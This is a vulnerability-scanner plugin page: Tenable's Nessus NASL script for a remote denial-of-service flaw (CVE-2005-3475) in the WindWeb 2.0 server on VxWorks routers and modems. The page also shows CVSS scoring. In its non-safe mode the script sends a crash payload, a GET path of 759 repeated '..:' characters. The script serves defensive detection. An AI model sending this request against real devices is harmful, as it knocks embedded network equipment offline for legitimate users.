Lucene search

K
nessusThis script is Copyright (C) 2005-2018 Tenable Network Security, Inc.WINDWEB_20_DOS.NASL
HistoryOct 28, 2005 - 12:00 a.m.

WindWeb <= 2.0 Malformed GET Request Remote DoS

2005-10-2800:00:00
This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
www.tenable.com
79

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

0.065 Low

EPSS

Percentile

93.7%

The remote host appears to be running the WindWeb web server, which is found on embedded devices running Wind River Systems’ VxWorks such as certain ADSL modems and routers.

The version of WindWeb installed on the remote host is affected by a remote denial of service vulnerability when it receives maliciously- crafted requests. An attacker may be able to leverage this issue to deny access to the web server to legitimate users.

#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if (description) {
  script_id(20097);
  script_version("1.15");

  script_cve_id("CVE-2005-3475");
  script_bugtraq_id(15225);

  script_name(english:"WindWeb <= 2.0 Malformed GET Request Remote DoS");
  script_summary(english:"Checks for denial of service vulnerability in WindWeb <= 2.0");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server is prone to denial of service attacks." );
 script_set_attribute(attribute:"description", value:
"The remote host appears to be running the WindWeb web server, which is
found on embedded devices running Wind River Systems' VxWorks such as
certain ADSL modems and routers. 

The version of WindWeb installed on the remote host is affected by a
remote denial of service vulnerability when it receives maliciously-
crafted requests.  An attacker may be able to leverage this issue to
deny access to the web server to legitimate users." );
 script_set_attribute(attribute:"see_also", value:"https://downloads.securityfocus.com/vulnerabilities/exploits/Hasbani_dos.c" );
 script_set_attribute(attribute:"solution", value:
"Limit access to the web server." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2005/10/28");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/10/27");
 script_cvs_date("Date: 2018/11/15 20:50:26");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();


  script_category(ACT_MIXED_ATTACK);
  script_family(english:"Web Servers");

  script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);

# Make sure it's WindWeb.
banner = get_http_banner(port:port);
if (banner && " WindWeb/" >< banner) {
  # If safe checks are enabled...
  if (safe_checks()) {
    # If we're being paranoid...
    if (report_paranoia > 1) {
      if (egrep(pattern:"^Server: +WindWeb/([01]\.|2\.0($|[^0-9]))", string:banner)) {
        report = string(
          "Nessus has determined the vulnerability exists on the remote\n",
          "host simply by looking at the version number of WindWeb\n",
          "installed there.\n"
        );
        security_warning(port:port, extra:report);
      }
    }
  }
  # Otherwise, try to crash it.
  else if (!http_is_dead(port:port)) {
    u = crap(length: 759, data: "..:");
    r = http_send_recv3(port: port, method: "GET", version: 10, item: u);
    sleep(1);
    if (http_is_dead(port:port)) {
      security_warning(port);
      exit(0);
    }
  }
}

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

0.065 Low

EPSS

Percentile

93.7%

Related for WINDWEB_20_DOS.NASL